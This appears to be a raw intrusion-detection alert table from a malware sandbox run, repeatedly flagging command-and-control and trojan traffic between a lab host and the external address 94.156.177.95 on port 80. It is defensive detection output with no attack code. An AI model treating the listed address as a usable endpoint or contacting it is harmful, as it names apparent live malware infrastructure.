                2024-11-15T18:14:46.714498+010020253811Malware Command and Control Activity Detected192.168.2.44975594.156.177.9580TCP
                2024-11-15T18:14:47.882051+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.9580TCP
                2024-11-15T18:14:49.034112+010020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.9580TCP
                2024-11-15T18:14:50.182971+010020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.9580TCP
                2024-11-15T18:14:51.319509+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.9580TCP
                2024-11-15T18:14:52.454053+010020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.9580TCP
                2024-11-15T18:14:53.594421+010020253811Malware Command and Control Activity Detected192.168.2.44976194.156.177.9580TCP
                2024-11-15T18:14:54.694505+010020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.9580TCP
                2024-11-15T18:14:56.897576+010020253811Malware Command and Control Activity Detected192.168.2.44976394.156.177.9580TCP
                2024-11-15T18:14:58.049519+010020253811Malware Command and Control Activity Detected192.168.2.44976594.156.177.9580TCP
                2024-11-15T18:14:59.161814+010020253811Malware Command and Control Activity Detected192.168.2.44976794.156.177.9580TCP
                2024-11-15T18:15:00.310997+010020253811Malware Command and Control Activity Detected192.168.2.44977394.156.177.9580TCP
                2024-11-15T18:15:01.433270+010020253811Malware Command and Control Activity Detected192.168.2.44977994.156.177.9580TCP
                2024-11-15T18:15:02.774194+010020253811Malware Command and Control Activity Detected192.168.2.44978594.156.177.9580TCP
                2024-11-15T18:15:03.942454+010020253811Malware Command and Control Activity Detected192.168.2.44979594.156.177.9580TCP
                2024-11-15T18:15:05.073942+010020253811Malware Command and Control Activity Detected192.168.2.44980294.156.177.9580TCP
                2024-11-15T18:15:06.199202+010020253811Malware Command and Control Activity Detected192.168.2.44980894.156.177.9580TCP
                2024-11-15T18:15:07.370279+010020253811Malware Command and Control Activity Detected192.168.2.44981394.156.177.9580TCP
                2024-11-15T18:15:08.480132+010020253811Malware Command and Control Activity Detected192.168.2.44981894.156.177.9580TCP
                2024-11-15T18:15:09.759213+010020253811Malware Command and Control Activity Detected192.168.2.44982594.156.177.9580TCP
                2024-11-15T18:15:10.869167+010020253811Malware Command and Control Activity Detected192.168.2.44983294.156.177.9580TCP
                2024-11-15T18:15:12.002434+010020253811Malware Command and Control Activity Detected192.168.2.44983694.156.177.9580TCP
                2024-11-15T18:15:13.104632+010020253811Malware Command and Control Activity Detected192.168.2.44984194.156.177.9580TCP
                2024-11-15T18:15:14.236003+010020253811Malware Command and Control Activity Detected192.168.2.44984994.156.177.9580TCP
                2024-11-15T18:15:15.349391+010020253811Malware Command and Control Activity Detected192.168.2.44985594.156.177.9580TCP
                2024-11-15T18:15:16.433713+010020253811Malware Command and Control Activity Detected192.168.2.44986094.156.177.9580TCP
                2024-11-15T18:15:17.538066+010020253811Malware Command and Control Activity Detected192.168.2.44986594.156.177.9580TCP
                2024-11-15T18:15:18.633126+010020253811Malware Command and Control Activity Detected192.168.2.44986994.156.177.9580TCP
                2024-11-15T18:15:19.765315+010020253811Malware Command and Control Activity Detected192.168.2.44987594.156.177.9580TCP
                2024-11-15T18:15:20.938967+010020253811Malware Command and Control Activity Detected192.168.2.44987994.156.177.9580TCP
                2024-11-15T18:15:22.075165+010020253811Malware Command and Control Activity Detected192.168.2.44988494.156.177.9580TCP
                2024-11-15T18:15:23.183308+010020253811Malware Command and Control Activity Detected192.168.2.44988894.156.177.9580TCP
                2024-11-15T18:15:24.806146+010020253811Malware Command and Control Activity Detected192.168.2.44989594.156.177.9580TCP
                2024-11-15T18:15:26.050868+010020253811Malware Command and Control Activity Detected192.168.2.44990094.156.177.9580TCP
                2024-11-15T18:15:27.207351+010020253811Malware Command and Control Activity Detected192.168.2.44990594.156.177.9580TCP
                2024-11-15T18:15:28.328661+010020253811Malware Command and Control Activity Detected192.168.2.44991194.156.177.9580TCP
                2024-11-15T18:15:29.444036+010020253811Malware Command and Control Activity Detected192.168.2.44991894.156.177.9580TCP
                2024-11-15T18:15:30.558346+010020253811Malware Command and Control Activity Detected192.168.2.44992394.156.177.9580TCP
                2024-11-15T18:15:32.185276+010020253811Malware Command and Control Activity Detected192.168.2.44993294.156.177.9580TCP
                2024-11-15T18:15:33.342990+010020253811Malware Command and Control Activity Detected192.168.2.44993694.156.177.9580TCP
                2024-11-15T18:15:34.461022+010020253811Malware Command and Control Activity Detected192.168.2.44994294.156.177.9580TCP
                2024-11-15T18:15:35.606842+010020253811Malware Command and Control Activity Detected192.168.2.44994994.156.177.9580TCP
                2024-11-15T18:15:36.942827+010020253811Malware Command and Control Activity Detected192.168.2.44995694.156.177.9580TCP
                2024-11-15T18:15:38.040556+010020253811Malware Command and Control Activity Detected192.168.2.44996594.156.177.9580TCP
                2024-11-15T18:15:39.160355+010020253811Malware Command and Control Activity Detected192.168.2.44997194.156.177.9580TCP
                2024-11-15T18:15:40.257744+010020253811Malware Command and Control Activity Detected192.168.2.44997894.156.177.9580TCP
                2024-11-15T18:15:41.402378+010020253811Malware Command and Control Activity Detected192.168.2.44998594.156.177.9580TCP
                2024-11-15T18:15:42.524040+010020253811Malware Command and Control Activity Detected192.168.2.44999194.156.177.9580TCP
                2024-11-15T18:15:43.648109+010020253811Malware Command and Control Activity Detected192.168.2.44999894.156.177.9580TCP
                2024-11-15T18:15:44.761342+010020253811Malware Command and Control Activity Detected192.168.2.45000394.156.177.9580TCP
                2024-11-15T18:15:45.883899+010020253811Malware Command and Control Activity Detected192.168.2.45001094.156.177.9580TCP
                2024-11-15T18:15:47.367955+010020253811Malware Command and Control Activity Detected192.168.2.45001694.156.177.9580TCP
                2024-11-15T18:15:48.523172+010020253811Malware Command and Control Activity Detected192.168.2.45002194.156.177.9580TCP
                2024-11-15T18:15:49.631500+010020253811Malware Command and Control Activity Detected192.168.2.45002694.156.177.9580TCP
                2024-11-15T18:15:51.452174+010020253811Malware Command and Control Activity Detected192.168.2.45003094.156.177.9580TCP
                2024-11-15T18:15:52.550655+010020253811Malware Command and Control Activity Detected192.168.2.45003994.156.177.9580TCP
                2024-11-15T18:15:53.681411+010020253811Malware Command and Control Activity Detected192.168.2.45004494.156.177.9580TCP
                2024-11-15T18:15:54.778594+010020253811Malware Command and Control Activity Detected192.168.2.45004994.156.177.9580TCP
                2024-11-15T18:15:55.941777+010020253811Malware Command and Control Activity Detected192.168.2.45005494.156.177.9580TCP
                2024-11-15T18:15:57.034588+010020253811Malware Command and Control Activity Detected192.168.2.45006394.156.177.9580TCP
                2024-11-15T18:15:58.148280+010020253811Malware Command and Control Activity Detected192.168.2.45006894.156.177.9580TCP
                2024-11-15T18:15:59.321996+010020253811Malware Command and Control Activity Detected192.168.2.45007394.156.177.9580TCP
                2024-11-15T18:16:00.432593+010020253811Malware Command and Control Activity Detected192.168.2.45008094.156.177.9580TCP
                2024-11-15T18:16:01.549900+010020253811Malware Command and Control Activity Detected192.168.2.45008494.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.762597+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449741TCP
                2024-11-15T18:14:32.896680+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449742TCP
                2024-11-15T18:14:34.039378+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449743TCP
                2024-11-15T18:14:35.164579+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449744TCP
                2024-11-15T18:14:36.290489+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449745TCP
                2024-11-15T18:14:37.448794+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449746TCP
                2024-11-15T18:14:38.608490+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449747TCP
                2024-11-15T18:14:39.766951+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449748TCP
                2024-11-15T18:14:40.872268+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449749TCP
                2024-11-15T18:14:42.021787+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449750TCP
                2024-11-15T18:14:43.124310+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449751TCP
                2024-11-15T18:14:44.294140+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449752TCP
                2024-11-15T18:14:45.441546+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449753TCP
                2024-11-15T18:14:46.568842+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449754TCP
                2024-11-15T18:14:47.666396+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449755TCP
                2024-11-15T18:14:48.868839+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449756TCP
                2024-11-15T18:14:49.980312+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449757TCP
                2024-11-15T18:14:51.176298+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449758TCP
                2024-11-15T18:14:52.296733+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449759TCP
                2024-11-15T18:14:53.441225+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449760TCP
                2024-11-15T18:14:54.538826+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449761TCP
                2024-11-15T18:14:56.701607+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449762TCP
                2024-11-15T18:14:57.896447+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449763TCP
                2024-11-15T18:14:59.001252+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449765TCP
                2024-11-15T18:15:00.112387+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449767TCP
                2024-11-15T18:15:01.280238+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449773TCP
                2024-11-15T18:15:02.623583+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449779TCP
                2024-11-15T18:15:03.765726+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449785TCP
                2024-11-15T18:15:04.930007+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449795TCP
                2024-11-15T18:15:06.039433+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449802TCP
                2024-11-15T18:15:07.188929+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449808TCP
                2024-11-15T18:15:08.333135+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449813TCP
                2024-11-15T18:15:09.449703+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449818TCP
                2024-11-15T18:15:10.720089+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449825TCP
                2024-11-15T18:15:11.845061+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449832TCP
                2024-11-15T18:15:12.953797+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449836TCP
                2024-11-15T18:15:14.085123+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449841TCP
                2024-11-15T18:15:15.188874+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449849TCP
                2024-11-15T18:15:16.288998+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449855TCP
                2024-11-15T18:15:17.368827+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449860TCP
                2024-11-15T18:15:18.474007+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449865TCP
                2024-11-15T18:15:19.612495+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449869TCP
                2024-11-15T18:15:20.775939+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449875TCP
                2024-11-15T18:15:21.920075+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449879TCP
                2024-11-15T18:15:23.035295+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449884TCP
                2024-11-15T18:15:24.556825+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449888TCP
                2024-11-15T18:15:25.767137+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449895TCP
                2024-11-15T18:15:27.034568+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449900TCP
                2024-11-15T18:15:28.166501+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449905TCP
                2024-11-15T18:15:29.278462+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449911TCP
                2024-11-15T18:15:30.406277+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449918TCP
                2024-11-15T18:15:32.033879+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449923TCP
                2024-11-15T18:15:33.192062+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449932TCP
                2024-11-15T18:15:34.318229+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449936TCP
                2024-11-15T18:15:35.460048+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449942TCP
                2024-11-15T18:15:36.562590+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449949TCP
                2024-11-15T18:15:37.899107+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449956TCP
                2024-11-15T18:15:39.007797+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449965TCP
                2024-11-15T18:15:40.101074+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449971TCP
                2024-11-15T18:15:41.252279+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449978TCP
                2024-11-15T18:15:42.363349+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449985TCP
                2024-11-15T18:15:43.501298+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449991TCP
                2024-11-15T18:15:44.614598+010020254831A Network Trojan was detected94.156.177.9580192.168.2.449998TCP
                2024-11-15T18:15:45.725988+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450003TCP
                2024-11-15T18:15:47.228182+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450010TCP
                2024-11-15T18:15:48.325705+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450016TCP
                2024-11-15T18:15:49.489769+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450021TCP
                2024-11-15T18:15:51.299652+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450026TCP
                2024-11-15T18:15:52.395416+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450030TCP
                2024-11-15T18:15:53.536574+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450039TCP
                2024-11-15T18:15:54.626383+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450044TCP
                2024-11-15T18:15:55.785103+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450049TCP
                2024-11-15T18:15:56.875613+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450054TCP
                2024-11-15T18:15:58.012601+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450063TCP
                2024-11-15T18:15:59.152769+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450068TCP
                2024-11-15T18:16:00.275401+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450073TCP
                2024-11-15T18:16:01.388476+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450080TCP
                2024-11-15T18:16:02.503491+010020254831A Network Trojan was detected94.156.177.9580192.168.2.450084TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.757247+010020243131Malware Command and Control Activity Detected192.168.2.44974194.156.177.9580TCP
                2024-11-15T18:14:32.891366+010020243131Malware Command and Control Activity Detected192.168.2.44974294.156.177.9580TCP
                2024-11-15T18:14:34.034011+010020243131Malware Command and Control Activity Detected192.168.2.44974394.156.177.9580TCP
                2024-11-15T18:14:35.159054+010020243131Malware Command and Control Activity Detected192.168.2.44974494.156.177.9580TCP
                2024-11-15T18:14:36.284393+010020243131Malware Command and Control Activity Detected192.168.2.44974594.156.177.9580TCP
                2024-11-15T18:14:37.443015+010020243131Malware Command and Control Activity Detected192.168.2.44974694.156.177.9580TCP
                2024-11-15T18:14:38.600814+010020243131Malware Command and Control Activity Detected192.168.2.44974794.156.177.9580TCP
                2024-11-15T18:14:39.761618+010020243131Malware Command and Control Activity Detected192.168.2.44974894.156.177.9580TCP
                2024-11-15T18:14:40.866807+010020243131Malware Command and Control Activity Detected192.168.2.44974994.156.177.9580TCP
                2024-11-15T18:14:42.016291+010020243131Malware Command and Control Activity Detected192.168.2.44975094.156.177.9580TCP
                2024-11-15T18:14:43.119045+010020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.9580TCP
                2024-11-15T18:14:44.288553+010020243131Malware Command and Control Activity Detected192.168.2.44975294.156.177.9580TCP
                2024-11-15T18:14:45.436270+010020243131Malware Command and Control Activity Detected192.168.2.44975394.156.177.9580TCP
                2024-11-15T18:14:46.563404+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.9580TCP
                2024-11-15T18:14:47.661088+010020243131Malware Command and Control Activity Detected192.168.2.44975594.156.177.9580TCP
                2024-11-15T18:14:48.863645+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.9580TCP
                2024-11-15T18:14:49.974935+010020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.9580TCP
                2024-11-15T18:14:51.170948+010020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.9580TCP
                2024-11-15T18:14:52.291246+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.9580TCP
                2024-11-15T18:14:53.435601+010020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.9580TCP
                2024-11-15T18:14:54.533464+010020243131Malware Command and Control Activity Detected192.168.2.44976194.156.177.9580TCP
                2024-11-15T18:14:56.696356+010020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.9580TCP
                2024-11-15T18:14:57.891299+010020243131Malware Command and Control Activity Detected192.168.2.44976394.156.177.9580TCP
                2024-11-15T18:14:58.995981+010020243131Malware Command and Control Activity Detected192.168.2.44976594.156.177.9580TCP
                2024-11-15T18:15:00.107047+010020243131Malware Command and Control Activity Detected192.168.2.44976794.156.177.9580TCP
                2024-11-15T18:15:01.275023+010020243131Malware Command and Control Activity Detected192.168.2.44977394.156.177.9580TCP
                2024-11-15T18:15:02.623425+010020243131Malware Command and Control Activity Detected192.168.2.44977994.156.177.9580TCP
                2024-11-15T18:15:03.759207+010020243131Malware Command and Control Activity Detected192.168.2.44978594.156.177.9580TCP
                2024-11-15T18:15:04.924439+010020243131Malware Command and Control Activity Detected192.168.2.44979594.156.177.9580TCP
                2024-11-15T18:15:06.034036+010020243131Malware Command and Control Activity Detected192.168.2.44980294.156.177.9580TCP
                2024-11-15T18:15:07.183769+010020243131Malware Command and Control Activity Detected192.168.2.44980894.156.177.9580TCP
                2024-11-15T18:15:08.327887+010020243131Malware Command and Control Activity Detected192.168.2.44981394.156.177.9580TCP
                2024-11-15T18:15:09.444469+010020243131Malware Command and Control Activity Detected192.168.2.44981894.156.177.9580TCP
                2024-11-15T18:15:10.714557+010020243131Malware Command and Control Activity Detected192.168.2.44982594.156.177.9580TCP
                2024-11-15T18:15:11.839294+010020243131Malware Command and Control Activity Detected192.168.2.44983294.156.177.9580TCP
                2024-11-15T18:15:12.948556+010020243131Malware Command and Control Activity Detected192.168.2.44983694.156.177.9580TCP
                2024-11-15T18:15:14.079858+010020243131Malware Command and Control Activity Detected192.168.2.44984194.156.177.9580TCP
                2024-11-15T18:15:15.183719+010020243131Malware Command and Control Activity Detected192.168.2.44984994.156.177.9580TCP
                2024-11-15T18:15:16.283700+010020243131Malware Command and Control Activity Detected192.168.2.44985594.156.177.9580TCP
                2024-11-15T18:15:17.363462+010020243131Malware Command and Control Activity Detected192.168.2.44986094.156.177.9580TCP
                2024-11-15T18:15:18.468562+010020243131Malware Command and Control Activity Detected192.168.2.44986594.156.177.9580TCP
                2024-11-15T18:15:19.607161+010020243131Malware Command and Control Activity Detected192.168.2.44986994.156.177.9580TCP
                2024-11-15T18:15:20.770567+010020243131Malware Command and Control Activity Detected192.168.2.44987594.156.177.9580TCP
                2024-11-15T18:15:21.914705+010020243131Malware Command and Control Activity Detected192.168.2.44987994.156.177.9580TCP
                2024-11-15T18:15:23.029911+010020243131Malware Command and Control Activity Detected192.168.2.44988494.156.177.9580TCP
                2024-11-15T18:15:24.551139+010020243131Malware Command and Control Activity Detected192.168.2.44988894.156.177.9580TCP
                2024-11-15T18:15:25.761835+010020243131Malware Command and Control Activity Detected192.168.2.44989594.156.177.9580TCP
                2024-11-15T18:15:27.028960+010020243131Malware Command and Control Activity Detected192.168.2.44990094.156.177.9580TCP
                2024-11-15T18:15:28.161346+010020243131Malware Command and Control Activity Detected192.168.2.44990594.156.177.9580TCP
                2024-11-15T18:15:29.273083+010020243131Malware Command and Control Activity Detected192.168.2.44991194.156.177.9580TCP
                2024-11-15T18:15:30.400380+010020243131Malware Command and Control Activity Detected192.168.2.44991894.156.177.9580TCP
                2024-11-15T18:15:32.028611+010020243131Malware Command and Control Activity Detected192.168.2.44992394.156.177.9580TCP
                2024-11-15T18:15:33.186723+010020243131Malware Command and Control Activity Detected192.168.2.44993294.156.177.9580TCP
                2024-11-15T18:15:34.312997+010020243131Malware Command and Control Activity Detected192.168.2.44993694.156.177.9580TCP
                2024-11-15T18:15:35.454641+010020243131Malware Command and Control Activity Detected192.168.2.44994294.156.177.9580TCP
                2024-11-15T18:15:36.557201+010020243131Malware Command and Control Activity Detected192.168.2.44994994.156.177.9580TCP
                2024-11-15T18:15:37.893726+010020243131Malware Command and Control Activity Detected192.168.2.44995694.156.177.9580TCP
                2024-11-15T18:15:39.002081+010020243131Malware Command and Control Activity Detected192.168.2.44996594.156.177.9580TCP
                2024-11-15T18:15:40.095784+010020243131Malware Command and Control Activity Detected192.168.2.44997194.156.177.9580TCP
                2024-11-15T18:15:41.246344+010020243131Malware Command and Control Activity Detected192.168.2.44997894.156.177.9580TCP
                2024-11-15T18:15:42.358174+010020243131Malware Command and Control Activity Detected192.168.2.44998594.156.177.9580TCP
                2024-11-15T18:15:43.496054+010020243131Malware Command and Control Activity Detected192.168.2.44999194.156.177.9580TCP
                2024-11-15T18:15:44.609401+010020243131Malware Command and Control Activity Detected192.168.2.44999894.156.177.9580TCP
                2024-11-15T18:15:45.720877+010020243131Malware Command and Control Activity Detected192.168.2.45000394.156.177.9580TCP
                2024-11-15T18:15:47.222539+010020243131Malware Command and Control Activity Detected192.168.2.45001094.156.177.9580TCP
                2024-11-15T18:15:48.320341+010020243131Malware Command and Control Activity Detected192.168.2.45001694.156.177.9580TCP
                2024-11-15T18:15:49.484132+010020243131Malware Command and Control Activity Detected192.168.2.45002194.156.177.9580TCP
                2024-11-15T18:15:51.299265+010020243131Malware Command and Control Activity Detected192.168.2.45002694.156.177.9580TCP
                2024-11-15T18:15:52.389939+010020243131Malware Command and Control Activity Detected192.168.2.45003094.156.177.9580TCP
                2024-11-15T18:15:53.531119+010020243131Malware Command and Control Activity Detected192.168.2.45003994.156.177.9580TCP
                2024-11-15T18:15:54.620846+010020243131Malware Command and Control Activity Detected192.168.2.45004494.156.177.9580TCP
                2024-11-15T18:15:55.779442+010020243131Malware Command and Control Activity Detected192.168.2.45004994.156.177.9580TCP
                2024-11-15T18:15:56.869263+010020243131Malware Command and Control Activity Detected192.168.2.45005494.156.177.9580TCP
                2024-11-15T18:15:58.000787+010020243131Malware Command and Control Activity Detected192.168.2.45006394.156.177.9580TCP
                2024-11-15T18:15:59.147535+010020243131Malware Command and Control Activity Detected192.168.2.45006894.156.177.9580TCP
                2024-11-15T18:16:00.270107+010020243131Malware Command and Control Activity Detected192.168.2.45007394.156.177.9580TCP
                2024-11-15T18:16:01.383166+010020243131Malware Command and Control Activity Detected192.168.2.45008094.156.177.9580TCP
                2024-11-15T18:16:02.497178+010020243131Malware Command and Control Activity Detected192.168.2.45008494.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.757247+010020243181Malware Command and Control Activity Detected192.168.2.44974194.156.177.9580TCP
                2024-11-15T18:14:32.891366+010020243181Malware Command and Control Activity Detected192.168.2.44974294.156.177.9580TCP
                2024-11-15T18:14:34.034011+010020243181Malware Command and Control Activity Detected192.168.2.44974394.156.177.9580TCP
                2024-11-15T18:14:35.159054+010020243181Malware Command and Control Activity Detected192.168.2.44974494.156.177.9580TCP
                2024-11-15T18:14:36.284393+010020243181Malware Command and Control Activity Detected192.168.2.44974594.156.177.9580TCP
                2024-11-15T18:14:37.443015+010020243181Malware Command and Control Activity Detected192.168.2.44974694.156.177.9580TCP
                2024-11-15T18:14:38.600814+010020243181Malware Command and Control Activity Detected192.168.2.44974794.156.177.9580TCP
                2024-11-15T18:14:39.761618+010020243181Malware Command and Control Activity Detected192.168.2.44974894.156.177.9580TCP
                2024-11-15T18:14:40.866807+010020243181Malware Command and Control Activity Detected192.168.2.44974994.156.177.9580TCP
                2024-11-15T18:14:42.016291+010020243181Malware Command and Control Activity Detected192.168.2.44975094.156.177.9580TCP
                2024-11-15T18:14:43.119045+010020243181Malware Command and Control Activity Detected192.168.2.44975194.156.177.9580TCP
                2024-11-15T18:14:44.288553+010020243181Malware Command and Control Activity Detected192.168.2.44975294.156.177.9580TCP
                2024-11-15T18:14:45.436270+010020243181Malware Command and Control Activity Detected192.168.2.44975394.156.177.9580TCP
                2024-11-15T18:14:46.563404+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.9580TCP
                2024-11-15T18:14:47.661088+010020243181Malware Command and Control Activity Detected192.168.2.44975594.156.177.9580TCP
                2024-11-15T18:14:48.863645+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.9580TCP
                2024-11-15T18:14:49.974935+010020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.9580TCP
                2024-11-15T18:14:51.170948+010020243181Malware Command and Control Activity Detected192.168.2.44975894.156.177.9580TCP
                2024-11-15T18:14:52.291246+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.9580TCP
                2024-11-15T18:14:53.435601+010020243181Malware Command and Control Activity Detected192.168.2.44976094.156.177.9580TCP
                2024-11-15T18:14:54.533464+010020243181Malware Command and Control Activity Detected192.168.2.44976194.156.177.9580TCP
                2024-11-15T18:14:56.696356+010020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.9580TCP
                2024-11-15T18:14:57.891299+010020243181Malware Command and Control Activity Detected192.168.2.44976394.156.177.9580TCP
                2024-11-15T18:14:58.995981+010020243181Malware Command and Control Activity Detected192.168.2.44976594.156.177.9580TCP
                2024-11-15T18:15:00.107047+010020243181Malware Command and Control Activity Detected192.168.2.44976794.156.177.9580TCP
                2024-11-15T18:15:01.275023+010020243181Malware Command and Control Activity Detected192.168.2.44977394.156.177.9580TCP
                2024-11-15T18:15:02.623425+010020243181Malware Command and Control Activity Detected192.168.2.44977994.156.177.9580TCP
                2024-11-15T18:15:03.759207+010020243181Malware Command and Control Activity Detected192.168.2.44978594.156.177.9580TCP
                2024-11-15T18:15:04.924439+010020243181Malware Command and Control Activity Detected192.168.2.44979594.156.177.9580TCP
                2024-11-15T18:15:06.034036+010020243181Malware Command and Control Activity Detected192.168.2.44980294.156.177.9580TCP
                2024-11-15T18:15:07.183769+010020243181Malware Command and Control Activity Detected192.168.2.44980894.156.177.9580TCP
                2024-11-15T18:15:08.327887+010020243181Malware Command and Control Activity Detected192.168.2.44981394.156.177.9580TCP
                2024-11-15T18:15:09.444469+010020243181Malware Command and Control Activity Detected192.168.2.44981894.156.177.9580TCP
                2024-11-15T18:15:10.714557+010020243181Malware Command and Control Activity Detected192.168.2.44982594.156.177.9580TCP
                2024-11-15T18:15:11.839294+010020243181Malware Command and Control Activity Detected192.168.2.44983294.156.177.9580TCP
                2024-11-15T18:15:12.948556+010020243181Malware Command and Control Activity Detected192.168.2.44983694.156.177.9580TCP
                2024-11-15T18:15:14.079858+010020243181Malware Command and Control Activity Detected192.168.2.44984194.156.177.9580TCP
                2024-11-15T18:15:15.183719+010020243181Malware Command and Control Activity Detected192.168.2.44984994.156.177.9580TCP
                2024-11-15T18:15:16.283700+010020243181Malware Command and Control Activity Detected192.168.2.44985594.156.177.9580TCP
                2024-11-15T18:15:17.363462+010020243181Malware Command and Control Activity Detected192.168.2.44986094.156.177.9580TCP
                2024-11-15T18:15:18.468562+010020243181Malware Command and Control Activity Detected192.168.2.44986594.156.177.9580TCP
                2024-11-15T18:15:19.607161+010020243181Malware Command and Control Activity Detected192.168.2.44986994.156.177.9580TCP
                2024-11-15T18:15:20.770567+010020243181Malware Command and Control Activity Detected192.168.2.44987594.156.177.9580TCP
                2024-11-15T18:15:21.914705+010020243181Malware Command and Control Activity Detected192.168.2.44987994.156.177.9580TCP
                2024-11-15T18:15:23.029911+010020243181Malware Command and Control Activity Detected192.168.2.44988494.156.177.9580TCP
                2024-11-15T18:15:24.551139+010020243181Malware Command and Control Activity Detected192.168.2.44988894.156.177.9580TCP
                2024-11-15T18:15:25.761835+010020243181Malware Command and Control Activity Detected192.168.2.44989594.156.177.9580TCP
                2024-11-15T18:15:27.028960+010020243181Malware Command and Control Activity Detected192.168.2.44990094.156.177.9580TCP
                2024-11-15T18:15:28.161346+010020243181Malware Command and Control Activity Detected192.168.2.44990594.156.177.9580TCP
                2024-11-15T18:15:29.273083+010020243181Malware Command and Control Activity Detected192.168.2.44991194.156.177.9580TCP
                2024-11-15T18:15:30.400380+010020243181Malware Command and Control Activity Detected192.168.2.44991894.156.177.9580TCP
                2024-11-15T18:15:32.028611+010020243181Malware Command and Control Activity Detected192.168.2.44992394.156.177.9580TCP
                2024-11-15T18:15:33.186723+010020243181Malware Command and Control Activity Detected192.168.2.44993294.156.177.9580TCP
                2024-11-15T18:15:34.312997+010020243181Malware Command and Control Activity Detected192.168.2.44993694.156.177.9580TCP
                2024-11-15T18:15:35.454641+010020243181Malware Command and Control Activity Detected192.168.2.44994294.156.177.9580TCP
                2024-11-15T18:15:36.557201+010020243181Malware Command and Control Activity Detected192.168.2.44994994.156.177.9580TCP
